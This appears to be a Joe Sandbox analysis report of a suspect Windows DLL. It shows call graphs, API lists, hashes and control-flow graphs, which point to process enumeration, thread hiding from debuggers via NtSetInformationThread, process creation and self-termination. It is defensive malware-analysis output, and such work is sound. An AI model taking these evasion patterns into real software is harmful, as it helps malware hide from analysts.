6c7d1990 __wsopen_s EnterCriticalSection 66549->66552 66550->66543 66551 6c7d16c0 LeaveCriticalSection 66550->66551 66551->66544 66552->66543 66553->66481 66554->66485 66555->66482 66556->66486 66557->66487 66559 6c7d15a2 __wsopen_s 18 API calls 66558->66559 66560 6c7cb935 66559->66560 66561 6c7cb93b 66560->66561 66563 6c7cb96d 66560->66563 66564 6c7d15a2 __wsopen_s 18 API calls 66560->66564 66562 6c7d171f __wsopen_s SetStdHandle 66561->66562 66570 6c7cb993 __dosmaperr 66562->66570 66563->66561 66565 6c7d15a2 __wsopen_s 18 API calls 66563->66565 66566 6c7cb964 66564->66566 66567 6c7cb979 CloseHandle 66565->66567 66568 6c7d15a2 __wsopen_s 18 API calls 66566->66568 66567->66561 66569 6c7cb985 GetLastError 66567->66569 66568->66563 66569->66561 66570->66474 66571->66490 66572->66496 66573->66498 66574->66373 66576 6c7c0bbe 66575->66576 66577 6c7c0ba9 66575->66577 66587 6c7c0bb9 66576->66587 66591 6c7c0cb9 66576->66591 66613 6c7c0120 18 API calls __cftoe 66577->66613 66584 6c7c0be1 66606 6c7cb898 66584->66606 66586 6c7c0be7 66586->66587 66614 6c7c47bb HeapFree GetLastError _free 66586->66614 66587->66376 66589->66378 66590->66378 66592 6c7c0cd1 66591->66592 66596 6c7c0bd3 66591->66596 66593 6c7c9c60 18 API calls 66592->66593 66592->66596 66594 6c7c0cef 66593->66594 66615 6c7cbb6c 66594->66615 66597 6c7c873e 66596->66597 66598 6c7c0bdb 66597->66598 66599 6c7c8755 66597->66599 66601 6c7c9c60 66598->66601 66599->66598 66704 6c7c47bb HeapFree GetLastError _free 66599->66704 66602 6c7c9c6c 66601->66602 66603 6c7c9c81 66601->66603 66705 6c7c0120 18 API calls __cftoe 66602->66705 66603->66584 66605 6c7c9c7c 66605->66584 66607 6c7cb8be 66606->66607 66608 6c7cb8a9 __dosmaperr 66606->66608 66609 6c7cb8e5 66607->66609 66610 6c7cb907 __dosmaperr 66607->66610 66608->66586 66706 6c7cb9c1 66609->66706 66714 6c7c0120 18 API calls __cftoe 66610->66714 66613->66587 66614->66587 66616 6c7cbb78 __wsopen_s 66615->66616 66617 6c7cbbca 66616->66617 66619 6c7cbc33 __dosmaperr 66616->66619 66622 6c7cbb80 __dosmaperr 66616->66622 66626 6c7d1990 EnterCriticalSection 66617->66626 66656 6c7c0120 18 API calls __cftoe 66619->66656 66620 6c7cbbd0 66624 6c7cbbec __dosmaperr 66620->66624 66627 6c7cbc5e 66620->66627 66622->66596 66655 6c7cbc2b LeaveCriticalSection __wsopen_s 66624->66655 66626->66620 66628 6c7cbc80 66627->66628 66654 6c7cbc9c __dosmaperr 66627->66654 66629 6c7cbc84 __dosmaperr 66628->66629 66630 6c7cbcd4 66628->66630 66664 6c7c0120 18 API calls __cftoe 66629->66664 66633 6c7cbce7 66630->66633 66665 6c7cac69 20 API calls __wsopen_s 66630->66665 66657 6c7cbe40 66633->66657 66636 6c7cbd3c 66638 6c7cbd95 WriteFile 66636->66638 66639 6c7cbd50 66636->66639 66637 6c7cbcfd 66640 6c7cbd26 66637->66640 66641 6c7cbd01 66637->66641 66642 6c7cbdb9 GetLastError 66638->66642 66638->66654 66644 6c7cbd5b 66639->66644 66645 6c7cbd85 66639->66645 66667 6c7cbeb1 43 API calls 5 library calls 66640->66667 66641->66654 66666 6c7cc25b 6 API calls __wsopen_s 66641->66666 66642->66654 66646 6c7cbd75 66644->66646 66647 6c7cbd60 66644->66647 66670 6c7cc2c3 7 API calls 2 library calls 66645->66670 66669 6c7cc487 8 API calls 3 library calls 66646->66669 66651 6c7cbd65 66647->66651 66647->66654 66650 6c7cbd73 66650->66654 66668 6c7cc39e 7 API calls 2 library calls 66651->66668 66654->66624 66655->66622 66656->66622 66671 6c7d19e5 66657->66671 66659 6c7cbe51 66660 6c7cbcf8 66659->66660 66676 6c7c49b2 GetLastError 66659->66676 66660->66636 66660->66637 66663 6c7cbe8e GetConsoleMode 66663->66660 66664->66654 66665->66633 66666->66654 66667->66654 66668->66650 66669->66650 66670->66650 66672 6c7d19f2 66671->66672 66674 6c7d19ff 66671->66674 66672->66659 66673 6c7d1a0b 66673->66659 66674->66673 66675 6c7c0120 __cftoe 18 API calls 66674->66675 66675->66672 66677 6c7c49c9 66676->66677 66678 6c7c49cf 66676->66678 66679 6c7c6b23 __Getctype 6 API calls 66677->66679 66680 6c7c6b62 __Getctype 6 API calls 66678->66680 66682 6c7c49d5 SetLastError 66678->66682 66679->66678 66681 6c7c49ed 66680->66681 66681->66682 66683 6c7c49f1 66681->66683 66689 6c7c4a69 66682->66689 66690 6c7c4a63 66682->66690 66684 6c7c71e5 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 66683->66684 66685 6c7c49fd 66684->66685 66687 6c7c4a1c 66685->66687 66688 6c7c4a05 66685->66688 66693 6c7c6b62 __Getctype 6 API calls 66687->66693 66691 6c7c6b62 __Getctype 6 API calls 66688->66691 66692 6c7c0ac9 __Getctype 35 API calls 66689->66692 66690->66660 66690->66663 66694 6c7c4a13 66691->66694 66695 6c7c4a6e 66692->66695 66696 6c7c4a28 66693->66696 66699 6c7c47bb _free HeapFree GetLastError 66694->66699 66697 6c7c4a2c 66696->66697 66698 6c7c4a3d 66696->66698 66700 6c7c6b62 __Getctype 6 API calls 66697->66700 66702 6c7c47bb _free HeapFree GetLastError 66698->66702 66701 6c7c4a19 66699->66701 66700->66694 66701->66682 66703 6c7c4a4f 66702->66703 66703->66682 66704->66598 66705->66605 66707 6c7cb9cd __wsopen_s 66706->66707 66715 6c7d1990 EnterCriticalSection 66707->66715 66709 6c7cb9db 66710 6c7cb925 __wsopen_s 21 API calls 66709->66710 66711 6c7cba08 66709->66711 66710->66711 66716 6c7cba41 LeaveCriticalSection __wsopen_s 66711->66716 66713 6c7cba2a 66713->66608 66714->66608 66715->66709 66716->66713 66717->66209 66718->66212 66719->66209 66720->66209 66721->66209 66723 6c68022e 66722->66723 66724 6c6570c4 66723->66724 66729 6c7c17db 66723->66729 66724->66220 66726->66223 66727->66225 66728->66227 66730 6c7c17e9 66729->66730 66731 6c7c1806 66729->66731 66730->66731 66732 6c7c180a 66730->66732 66733 6c7c17f6 66730->66733 66731->66723 66737 6c7c1a02 66732->66737 66745 6c7c0120 18 API calls __cftoe 66733->66745 66738 6c7c1a0e __wsopen_s 66737->66738 66746 6c7bc5a9 EnterCriticalSection 66738->66746 66740 6c7c1a1c 66747 6c7c19bf 66740->66747 66744 6c7c183c 66744->66723 66745->66731 66746->66740 66755 6c7c85a6 66747->66755 66753 6c7c19f9 66754 6c7c1a51 LeaveCriticalSection 66753->66754 66754->66744 66756 6c7c9c60 18 API calls 66755->66756 66757 6c7c85b7 66756->66757 66758 6c7d19e5 __wsopen_s 18 API calls 66757->66758 66759 6c7c85bd __wsopen_s 66758->66759 66760 6c7c19d3 66759->66760 66772 6c7c47bb HeapFree GetLastError _free 66759->66772 66762 6c7c183e 66760->66762 66764 6c7c1850 66762->66764 66766 6c7c186e 66762->66766 66763 6c7c185e 66773 6c7c0120 18 API calls __cftoe 66763->66773 66764->66763 66764->66766 66769 6c7c1886 _Yarn 66764->66769 66771 6c7c8659 62 API calls 66766->66771 66767 6c7c0cb9 62 API calls 66767->66769 66768 6c7c9c60 18 API calls 66768->66769 66769->66766 66769->66767 66769->66768 66770 6c7cbb6c __wsopen_s 62 API calls 66769->66770 66770->66769 66771->66753 66772->66760 66773->66766 66775 6c7b6025 66774->66775 66776 6c682020 52 API calls 66775->66776 66777 6c7b60c6 66776->66777 66778 6c7b6a43 std::_Facet_Register 4 API calls 66777->66778 66779 6c7b60fe 66778->66779 66780 6c7b7327 43 API calls 66779->66780 66781 6c7b6112 66780->66781 66782 6c681d90 89 API calls 66781->66782 66783 6c7b61bb 66782->66783 66784 6c7b61ec 66783->66784 66826 6c682250 30 API calls 66783->66826 66784->66243 66786 6c7b6226 66827 6c6826e0 24 API calls 4 library calls 66786->66827 66788 6c7b6238 66828 6c7b9379 RaiseException 66788->66828 66790 6c7b624d 66791 6c67e010 67 API calls 66790->66791 66792 6c7b625f 66791->66792 66792->66243 66794 6c7b638d 66793->66794 66829 6c7b65a0 66794->66829 66796 6c7b647c 66796->66245 66799 6c7b63a5 66799->66796 66847 6c682250 30 API calls 66799->66847 66848 6c6826e0 24 API calls 4 library calls 66799->66848 66849 6c7b9379 RaiseException 66799->66849 66802 6c69203f 66801->66802 66806 6c692053 66802->66806 66858 6c683560 32 API calls std::_Xinvalid_argument 66802->66858 66805 6c69210e 66807 6c692121 66805->66807 66859 6c6837e0 32 API calls std::_Xinvalid_argument 66805->66859 66806->66805 66860 6c682250 30 API calls 66806->66860 66861 6c6826e0 24 API calls 4 library calls 66806->66861 66862 6c7b9379 RaiseException 66806->66862 66807->66245 66812 6c7b5b9e 66811->66812 66816 6c7b5bd1 66811->66816 66813 6c6801f0 64 API calls 66812->66813 66815 6c7b5bc4 66813->66815 66814 6c7b5c83 66814->66254 66817 6c7c0b18 67 API calls 66815->66817 66816->66814 66863 6c682250 30 API calls 66816->66863 66817->66816 66819 6c7b5cae 66864 6c682340 24 API calls 66819->66864 66821 6c7b5cbe 66865 6c7b9379 RaiseException 66821->66865 66823 6c7b5cc9 66824 6c67e010 67 API calls 66823->66824 66825 6c7b5d22 std::ios_base::_Ios_base_dtor 66824->66825 66825->66254 66826->66786 66827->66788 66828->66790 66830 6c7b6608 66829->66830 66831 6c7b65dc 66829->66831 66837 6c7b6619 66830->66837 66850 6c683560 32 API calls std::_Xinvalid_argument 66830->66850 66832 6c7b6601 66831->66832 66852 6c682250 30 API calls 66831->66852 66832->66799 66835 6c7b67e8 66853 6c682340 24 API calls 66835->66853 66837->66832 66851 6c682f60 42 API calls 4 library calls 66837->66851 66838 6c7b67f7 66854 6c7b9379 RaiseException 66838->66854 66842 6c7b6827 66856 6c682340 24 API calls 66842->66856 66844 6c7b683d 66857 6c7b9379 RaiseException 66844->66857 66846 6c7b6653 66846->66832 66855 6c682250 30 API calls 66846->66855 66847->66799 66848->66799 66849->66799 66850->66837 66851->66846 66852->66835 66853->66838 66854->66846 66855->66842 66856->66844 66857->66832 66858->66806 66859->66807 66860->66806 66861->66806 66862->66806 66863->66819 66864->66821 66865->66823 66866 6c633d62 66869 6c633bc0 66866->66869 66867 6c633e8a GetCurrentThread NtSetInformationThread 66868 6c633eea 66867->66868 66869->66867 66870 6c644a27 66872 6c644a5d _strlen 66870->66872 66871 6c65639e 66961 6c7c0130 18 API calls 2 library calls 66871->66961 66872->66871 66873 6c645b6f 66872->66873 66874 6c645b58 66872->66874 66878 6c645b09 _Yarn 66872->66878 66877 6c7b6a43 std::_Facet_Register 4 API calls 66873->66877 66876 6c7b6a43 std::_Facet_Register 4 API calls 66874->66876 66876->66878 66877->66878 66879 6c7aaec0 FindFirstFileA 66878->66879 66881 6c645bad std::ios_base::_Ios_base_dtor 66879->66881 66880 6c7b4ff0 4 API calls 66890 6c6461cb _strlen 66880->66890 66881->66871 66881->66880 66885 6c649ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 66881->66885 66882 6c7b6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66882->66885 66883 6c7aaec0 FindFirstFileA 66883->66885 66884 6c64a292 Sleep 66903 6c649bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 66884->66903 66885->66871 66885->66882 66885->66883 66885->66884 66902 6c64e619 66885->66902 66886 6c646624 66889 6c7b6a43 std::_Facet_Register 4 API calls 66886->66889 66887 6c64660d 66888 6c7b6a43 std::_Facet_Register 4 API calls 66887->66888 66894 6c6465bc _Yarn _strlen 66888->66894 66889->66894 66890->66871 66890->66886 66890->66887 66890->66894 66891 6c649bbd GetCurrentProcess TerminateProcess 66891->66885 66892 6c6563b2 66962 6c6315e0 18 API calls std::ios_base::_Ios_base_dtor 66892->66962 66894->66892 66896 6c646970 66894->66896 66897 6c646989 66894->66897 66900 6c646920 _Yarn 66894->66900 66895 6c6564f8 66898 6c7b6a43 std::_Facet_Register 4 API calls 66896->66898 66899 6c7b6a43 std::_Facet_Register 4 API calls 66897->66899 66898->66900 66899->66900 66901 6c7b5960 104 API calls 66900->66901 66904 6c6469d6 std::ios_base::_Ios_base_dtor _strlen 66901->66904 66905 6c64f243 CreateFileA 66902->66905 66903->66871 66903->66885 66903->66891 66903->66892 66925 6c7b5960 104 API calls 66903->66925 66957 6c7b6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66903->66957 66960 6c7b4ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 66903->66960 66904->66871 66907 6c646dd2 66904->66907 66908 6c646dbb 66904->66908 66919 6c646d69 _Yarn _strlen 66904->66919 66913 6c64f2a7 66905->66913 66906 6c6502ca 66910 6c7b6a43 std::_Facet_Register 4 API calls 66907->66910 66909 6c7b6a43 std::_Facet_Register 4 API calls 66908->66909 66909->66919 66910->66919 66911 6c647427 66914 6c7b6a43 std::_Facet_Register 4 API calls 66911->66914 66912 6c647440 66915 6c7b6a43 std::_Facet_Register 4 API calls 66912->66915 66913->66906 66918 6c6502ac GetCurrentProcess TerminateProcess 66913->66918 66916 6c6473da _Yarn 66914->66916 66915->66916 66917 6c7b5960 104 API calls 66916->66917 66920 6c64748d std::ios_base::_Ios_base_dtor _strlen 66917->66920 66918->66906 66919->66892 66919->66911 66919->66912 66919->66916 66920->66871 66921 6c647991 66920->66921 66922 6c6479a8 66920->66922 66926 6c647940 _Yarn _strlen 66920->66926 66923 6c7b6a43 std::_Facet_Register 4 API calls 66921->66923 66924 6c7b6a43 std::_Facet_Register 4 API calls 66922->66924 66923->66926 66924->66926 66925->66903 66926->66892 66927 6c647de2 66926->66927 66928 6c647dc9 66926->66928 66931 6c647d7c _Yarn 66926->66931 66929 6c7b6a43 std::_Facet_Register 4 API calls 66927->66929 66930 6c7b6a43 std::_Facet_Register 4 API calls 66928->66930 66929->66931 66930->66931 66932 6c7b5960 104 API calls 66931->66932 66933 6c647e2f std::ios_base::_Ios_base_dtor _strlen 66932->66933 66933->66871 66934 6c6485bf 66933->66934 66935 6c6485a8 66933->66935 66942 6c648556 _Yarn _strlen 66933->66942 66937 6c7b6a43 std::_Facet_Register 4 API calls 66934->66937 66936 6c7b6a43 std::_Facet_Register 4 API calls 66935->66936 66936->66942 66937->66942 66938 6c648983 66941 6c7b6a43 std::_Facet_Register 4 API calls 66938->66941 66939 6c64896a 66940 6c7b6a43 std::_Facet_Register 4 API calls 66939->66940 66943 6c64891d _Yarn 66940->66943 66941->66943 66942->66892 66942->66938 66942->66939 66942->66943 66944 6c7b5960 104 API calls 66943->66944 66947 6c6489d0 std::ios_base::_Ios_base_dtor _strlen 66944->66947 66945 6c648f36 66949 6c7b6a43 std::_Facet_Register 4 API calls 66945->66949 66946 6c648f1f 66948 6c7b6a43 std::_Facet_Register 4 API calls 66946->66948 66947->66871 66947->66945 66947->66946 66950 6c648ecd _Yarn _strlen 66947->66950 66948->66950 66949->66950 66950->66892 66951 6c649354 66950->66951 66952 6c64936d 66950->66952 66955 6c649307 _Yarn 66950->66955 66953 6c7b6a43 std::_Facet_Register 4 API calls 66951->66953 66954 6c7b6a43 std::_Facet_Register 4 API calls 66952->66954 66953->66955 66954->66955 66956 6c7b5960 104 API calls 66955->66956 66959 6c6493ba std::ios_base::_Ios_base_dtor 66956->66959 66957->66903 66958 6c7b4ff0 4 API calls 66958->66885 66959->66871 66959->66958 66960->66903 66962->66895 66963 6c64f150 66965 6c64efbe 66963->66965 66964 6c64f243 CreateFileA 66967 6c64f2a7 66964->66967 66965->66964 66966 6c6502ca 66967->66966 66968 6c6502ac GetCurrentProcess TerminateProcess 66967->66968 66968->66966 66969 6c7bef3f 66970 6c7bef4b __wsopen_s 66969->66970 66971 6c7bef5f 66970->66971 66972 6c7bef52 GetLastError ExitThread 66970->66972 66973 6c7c49b2 __Getctype 37 API calls 66971->66973 66974 6c7bef64 66973->66974 66981 6c7c9d66 66974->66981 66977 6c7bef7b 66987 6c7beeaa 16 API calls 2 library calls 66977->66987 66980 6c7bef9d 66982 6c7c9d78 GetPEB 66981->66982 66983 6c7bef6f 66981->66983 66982->66983 66984 6c7c9d8b 66982->66984 66983->66977 66986 6c7c6d6f 5 API calls std::_Lockit::_Lockit 66983->66986 66988 6c7c6e18 5 API calls std::_Lockit::_Lockit 66984->66988 66986->66977 66987->66980 66988->66983 66989 6c643b72 66990 6c7b6a43 std::_Facet_Register 4 API calls 66989->66990 66996 6c6437e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 66990->66996 66991 6c7aaec0 FindFirstFileA 66991->66996 66992 6c65639e 67002 6c7c0130 18 API calls 2 library calls 66992->67002 66994 6c656ba0 104 API calls 66994->66996 66995 6c656e60 32 API calls 66995->66996 66996->66991 66996->66992 66996->66994 66996->66995 66997 6c657090 77 API calls 66996->66997 66998 6c67e010 67 API calls 66996->66998 66997->66996 66998->66996 67003 6c7ccad3 67004 6c7ccafd 67003->67004 67005 6c7ccae5 __dosmaperr 67003->67005 67004->67005 67007 6c7ccb48 __dosmaperr 67004->67007 67008 6c7ccb77 67004->67008 67045 6c7c0120 18 API calls __cftoe 67007->67045 67009 6c7ccb90 67008->67009 67010 6c7ccbab __dosmaperr 67008->67010 67013 6c7ccbe7 __wsopen_s 67008->67013 67009->67010 67012 6c7ccb95 67009->67012 67038 6c7c0120 18 API calls __cftoe 67010->67038 67011 6c7d19e5 __wsopen_s 18 API calls 67015 6c7ccd3e 67011->67015 67012->67011 67039 6c7c47bb HeapFree GetLastError _free 67013->67039 67018 6c7ccdb4 67015->67018 67021 6c7ccd57 GetConsoleMode 67015->67021 67016 6c7ccc07 67040 6c7c47bb HeapFree GetLastError _free 67016->67040 67020 6c7ccdb8 ReadFile 67018->67020 67023 6c7cce2c GetLastError 67020->67023 67024 6c7ccdd2 67020->67024 67021->67018 67025 6c7ccd68 67021->67025 67022 6c7ccc0e 67026 6c7ccbc2 __dosmaperr __wsopen_s 67022->67026 67041 6c7cac69 20 API calls __wsopen_s 67022->67041 67023->67026 67024->67023 67027 6c7ccda9 67024->67027 67025->67020 67028 6c7ccd6e ReadConsoleW 67025->67028 67042 6c7c47bb HeapFree GetLastError _free 67026->67042 67027->67026 67032 6c7cce0e 67027->67032 67033 6c7ccdf7 67027->67033 67028->67027 67031 6c7ccd8a GetLastError 67028->67031 67031->67026 67032->67026 67034 6c7cce25 67032->67034 67043 6c7ccefe 23 API calls 3 library calls 67033->67043 67044 6c7cd1b6 21 API calls __wsopen_s 67034->67044 67037 6c7cce2a 67037->67026 67038->67026 67039->67016 67040->67022 67041->67012 67042->67005 67043->67026 67044->67037 67045->67005
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID: HR^
                                          • API String ID: 4218353326-1341859651
                                          • Opcode ID: 33ef746c46d28c96e16b4bb474b095592f6d1b1c965e89251ca85e73edbbce62
                                          • Instruction ID: 86eb74eb3cdef4ce1f8a880e16651d1a85ff0016cf794546f118fe5ba31b6d08
                                          • Opcode Fuzzy Hash: 33ef746c46d28c96e16b4bb474b095592f6d1b1c965e89251ca85e73edbbce62
                                          • Instruction Fuzzy Hash: 07741571644B018FC728CF28C8D06D5B7F3EF95318B19DA2DC0AA8BA55EB74B54ACB44
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: }jk$;T55$L@^
                                          • API String ID: 0-4218709813
                                          • Opcode ID: 41756269f30692aa142c610124dbf87ee3e28e5dd8e2cd1faee6372404b88412
                                          • Instruction ID: 4ceb5e4987d867994ea24cda3a03ce9942aa4f35414922e3f09462902f1878f8
                                          • Opcode Fuzzy Hash: 41756269f30692aa142c610124dbf87ee3e28e5dd8e2cd1faee6372404b88412
                                          • Instruction Fuzzy Hash: 5A341971645B018FC728CF28C8D0A96B7E3EFC5318B19CA6DC0968BB55EB74B54ACB44

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7677 6c7b5240-6c7b5275 CreateToolhelp32Snapshot 7678 6c7b52a0-6c7b52a9 7677->7678 7679 6c7b52ab-6c7b52b0 7678->7679 7680 6c7b52e0-6c7b52e5 7678->7680 7683 6c7b52b2-6c7b52b7 7679->7683 7684 6c7b5315-6c7b531a 7679->7684 7681 6c7b52eb-6c7b52f0 7680->7681 7682 6c7b5377-6c7b53a1 call 6c7c2c05 7680->7682 7685 6c7b52f2-6c7b52f7 7681->7685 7686 6c7b5277-6c7b5292 CloseHandle 7681->7686 7682->7678 7690 6c7b52b9-6c7b52be 7683->7690 7691 6c7b5334-6c7b535d call 6c7bb920 Process32FirstW 7683->7691 7687 6c7b5320-6c7b5332 Process32NextW 7684->7687 7688 6c7b53a6-6c7b53ab 7684->7688 7685->7678 7693 6c7b52f9-6c7b5313 7685->7693 7686->7678 7694 6c7b5362-6c7b5372 7687->7694 7688->7678 7697 6c7b53b1-6c7b53bf 7688->7697 7690->7678 7692 6c7b52c0-6c7b52d1 7690->7692 7691->7694 7692->7678 7693->7678 7694->7678
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C7B524E
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: CreateSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3332741929-0
                                          • Opcode ID: 7054737ebe3ad2b4e6daa2e2203786e741401c1683fef36805e7092d2d9a4dfe
                                          • Instruction ID: e703e983933c7e92049e6144f96d942527de8355b9292908d6f5d1b08757899a
                                          • Opcode Fuzzy Hash: 7054737ebe3ad2b4e6daa2e2203786e741401c1683fef36805e7092d2d9a4dfe
                                          • Instruction Fuzzy Hash: 59318DB46093009FD7519F28D988B4ABBF4AF96758F50493EF488E7360D371D8488B93

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7821 6c633886-6c63388e 7822 6c633970-6c63397d 7821->7822 7823 6c633894-6c633896 7821->7823 7825 6c6339f1-6c6339f8 7822->7825 7826 6c63397f-6c633989 7822->7826 7823->7822 7824 6c63389c-6c6338b9 7823->7824 7829 6c6338c0-6c6338c1 7824->7829 7827 6c633ab5-6c633aba 7825->7827 7828 6c6339fe-6c633a03 7825->7828 7826->7824 7830 6c63398f-6c633994 7826->7830 7827->7824 7834 6c633ac0-6c633ac7 7827->7834 7831 6c6338d2-6c6338d4 7828->7831 7832 6c633a09-6c633a2f 7828->7832 7833 6c63395e 7829->7833 7835 6c633b16-6c633b18 7830->7835 7836 6c63399a-6c63399f 7830->7836 7839 6c633957-6c63395c 7831->7839 7837 6c633a35-6c633a3a 7832->7837 7838 6c6338f8-6c633955 7832->7838 7840 6c633960-6c633964 7833->7840 7834->7829 7841 6c633acd-6c633ad6 7834->7841 7835->7829 7842 6c6339a5-6c6339bf 7836->7842 7843 6c63383b-6c633855 call 6c781470 call 6c781480 7836->7843 7845 6c633a40-6c633a57 7837->7845 7846 6c633b1d-6c633b22 7837->7846 7838->7839 7839->7833 7848 6c633860-6c633885 7840->7848 7849 6c63396a 7840->7849 7841->7835 7850 6c633ad8-6c633aeb 7841->7850 7844 6c633a5a-6c633a5d 7842->7844 7843->7848 7853 6c633aa9-6c633ab0 7844->7853 7845->7844 7851 6c633b24-6c633b44 7846->7851 7852 6c633b49-6c633b50 7846->7852 7848->7821 7855 6c633ba1-6c633bb6 7849->7855 7850->7838 7856 6c633af1-6c633af8 7850->7856 7851->7853 7852->7829 7859 6c633b56-6c633b5d 7852->7859 7853->7840 7860 6c633bc0-6c633bda call 6c781470 call 6c781480 7855->7860 7862 6c633b62-6c633b85 7856->7862 7863 6c633afa-6c633aff 7856->7863 7859->7840 7872 6c633be0-6c633bfe 7860->7872 7862->7838 7866 6c633b8b 7862->7866 7863->7839 7866->7855 7875 6c633c04-6c633c11 7872->7875 7876 6c633e7b 7872->7876 7877 6c633ce0-6c633cea 7875->7877 7878 6c633c17-6c633c20 7875->7878 7879 6c633e81-6c633ee0 call 6c633750 GetCurrentThread NtSetInformationThread 7876->7879 7883 6c633d3a-6c633d3c 7877->7883 7884 6c633cec-6c633d0c 7877->7884 7880 6c633c26-6c633c2d 7878->7880 7881 6c633dc5 7878->7881 7894 6c633eea-6c633f04 call 6c781470 call 6c781480 7879->7894 7885 6c633dc3 7880->7885 7886 6c633c33-6c633c3a 7880->7886 7888 6c633dc6 7881->7888 7890 6c633d70-6c633d8d 7883->7890 7891 6c633d3e-6c633d45 7883->7891 7889 6c633d90-6c633d95 7884->7889 7885->7881 7892 6c633c40-6c633c5b 7886->7892 7893 6c633e26-6c633e2b 7886->7893 7898 6c633dc8-6c633dcc 7888->7898 7896 6c633d97-6c633db8 7889->7896 7897 6c633dba-6c633dc1 7889->7897 7890->7889 7895 6c633d50-6c633d57 7891->7895 7900 6c633e1b-6c633e24 7892->7900 7901 6c633e31 7893->7901 7902 6c633c7b-6c633cd0 7893->7902 7915 6c633f75-6c633fa1 7894->7915 7895->7888 7896->7881 7897->7885 7904 6c633dd7-6c633ddc 7897->7904 7898->7872 7899 6c633dd2 7898->7899 7907 6c633e76-6c633e79 7899->7907 7900->7898 7900->7907 7901->7860 7902->7895 7905 6c633e36-6c633e3d 7904->7905 7906 6c633dde-6c633e17 7904->7906 7910 6c633e3f-6c633e5a 7905->7910 7911 6c633e5c-6c633e5f 7905->7911 7906->7900 7907->7879 7910->7900 7911->7902 7913 6c633e65-6c633e69 7911->7913 7913->7898 7913->7907 7919 6c633fa3-6c633fa8 7915->7919 7920 6c634020-6c634026 7915->7920 7921 6c633fae-6c633fcf 7919->7921 7922 6c63407c-6c634081 7919->7922 7923 6c633f06-6c633f35 7920->7923 7924 6c63402c-6c63403c 7920->7924 7925 6c6340aa-6c6340ae 7921->7925 7922->7925 7926 6c634083-6c63408a 7922->7926 7927 6c633f38-6c633f61 7923->7927 7928 6c6340b3-6c6340b8 7924->7928 7929 6c63403e-6c634058 7924->7929 7931 6c633f6b-6c633f6f 7925->7931 7926->7927 7932 6c634090 7926->7932 7934 6c633f64-6c633f67 7927->7934 7928->7921 7933 6c6340be-6c6340c9 7928->7933 7930 6c63405a-6c634063 7929->7930 7935 6c6340f5-6c63413f 7930->7935 7936 6c634069-6c63406c 7930->7936 7931->7915 7932->7894 7937 6c6340a7 7932->7937 7933->7925 7938 6c6340cb-6c6340d4 7933->7938 7939 6c633f69 7934->7939 7935->7939 7940 6c634072-6c634077 7936->7940 7941 6c634144-6c63414b 7936->7941 7937->7925 7938->7937 7942 6c6340d6-6c6340f0 7938->7942 7939->7931 7940->7934 7941->7931 7942->7930
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
